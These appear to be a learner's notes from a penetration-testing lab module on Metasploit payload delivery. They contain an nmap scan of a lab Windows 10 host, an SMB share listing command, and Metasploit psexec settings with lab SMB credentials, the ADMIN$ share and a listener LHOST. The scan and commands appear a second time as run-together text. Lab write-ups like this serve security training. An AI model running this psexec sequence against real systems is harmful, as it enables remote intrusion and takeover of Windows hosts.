Automating Payloads & Delivery with Metasploit

April 27, 2024

# Nmap 7.94 scan initiated Sat Apr 27 23:41:51 2024 as: nmap -sC -sV -oN nmap -vv 10.129.68.35
Increasing send delay for 10.129.68.35 from 0 to 5 due to 62 out of 206 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 5 to 10 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 10 to 20 due to 13 out of 41 dropped probes since last increase.
Nmap scan report for 10.129.68.35
Host is up, received syn-ack (0.34s latency).
Scanned at 2024-04-27 23:41:51 PST for 400s
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE SERVICE     REASON  VERSION
7/tcp    open  echo        syn-ack
9/tcp    open  discard?    syn-ack
13/tcp   open  daytime     syn-ack Microsoft Windows USA daytime
17/tcp   open  qotd        syn-ack Windows qotd (English)
19/tcp   open  chargen     syn-ack
80/tcp   open  http        syn-ack Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc       syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp  open  microsof@  syn-ack Windows 10 Pro 18363 microsoft-ds (workgroup: WORKGROUP)
2179/tcp open  vmrdp?      syn-ack
Service Info: Host: SHELLS-WIN10; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 57959/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 50733/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 25647/udp): CLEAN (Failed to receive data)
|   Check 4 (port 20860/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 2h20m05s, deviation: 4h02m30s, median: 4s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-04-27T15:48:07
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 10 Pro 18363 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Shells-Win10
|   NetBIOS computer name: SHELLS-WIN10\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-04-27T08:48:08-07:00

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 27 23:48:31 2024 -- 1 IP address (1 host up) scanned in 400.77 seconds

 smbclient -L 10.129.68.35 -U htb-student

search smb

use 63

msf6 exploit(windows/smb/psexec) > set RHOSTS 10.129.180.71

msf6 exploit(windows/smb/psexec) > set SHARE ADMIN$

msf6 exploit(windows/smb/psexec) > set SMBPass HTB_@cademy_stdnt!

msf6 exploit(windows/smb/psexec) > set SMBUser htb-student

msf6 exploit(windows/smb/psexec) > set LHOST 10.10.14.197

PreviousIntroduction to Payloads NextCrafting Payloads with MSFvenom

Last updated 1 year ago

# Nmap 7.94 scan initiated Sat Apr 27 23:41:51 2024 as: nmap -sC -sV -oN nmap -vv 10.129.68.35 Increasing send delay for 10.129.68.35 from 0 to 5 due to 62 out of 206 dropped probes since last increase. Increasing send delay for 10.129.68.35 from 5 to 10 due to 11 out of 13 dropped probes since last increase. Increasing send delay for 10.129.68.35 from 10 to 20 due to 13 out of 41 dropped probes since last increase. Nmap scan report for 10.129.68.35 Host is up, received syn-ack (0.34s latency). Scanned at 2024-04-27 23:41:51 PST for 400s Not shown: 990 closed tcp ports (conn-refused) PORT STATE SERVICE REASON VERSION 7/tcp open echo syn-ack 9/tcp open discard? syn-ack 13/tcp open daytime syn-ack Microsoft Windows USA daytime 17/tcp open qotd syn-ack Windows qotd (English) 19/tcp open chargen syn-ack 80/tcp open http syn-ack Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-title: IIS Windows |_http-server-header: Microsoft-IIS/10.0 135/tcp open msrpc syn-ack Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn 445/tcp open microsof@ syn-ack Windows 10 Pro 18363 microsoft-ds (workgroup: WORKGROUP) 2179/tcp open vmrdp? syn-ack Service Info: Host: SHELLS-WIN10; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 57959/tcp): CLEAN (Couldn't connect) | Check 2 (port 50733/tcp): CLEAN (Couldn't connect) | Check 3 (port 25647/udp): CLEAN (Failed to receive data) | Check 4 (port 20860/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked |_clock-skew: mean: 2h20m05s, deviation: 4h02m30s, median: 4s | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2024-04-27T15:48:07 |_ start_date: N/A | smb-os-discovery: | OS: Windows 10 Pro 18363 (Windows 10 Pro 6.3) | OS CPE: cpe:/o:microsoft:windows_10::- | Computer name: Shells-Win10 | NetBIOS computer name: SHELLS-WIN10\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2024-04-27T08:48:08-07:00 Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Apr 27 23:48:31 2024 -- 1 IP address (1 host up) scanned in 400.77 seconds

msf6 exploit(windows/smb/psexec) > set RHOSTS 10.129.180.71 msf6 exploit(windows/smb/psexec) > set SHARE ADMIN$ msf6 exploit(windows/smb/psexec) > set SMBPass HTB_@cademy_stdnt! msf6 exploit(windows/smb/psexec) > set SMBUser htb-student msf6 exploit(windows/smb/psexec) > set LHOST 10.10.14.197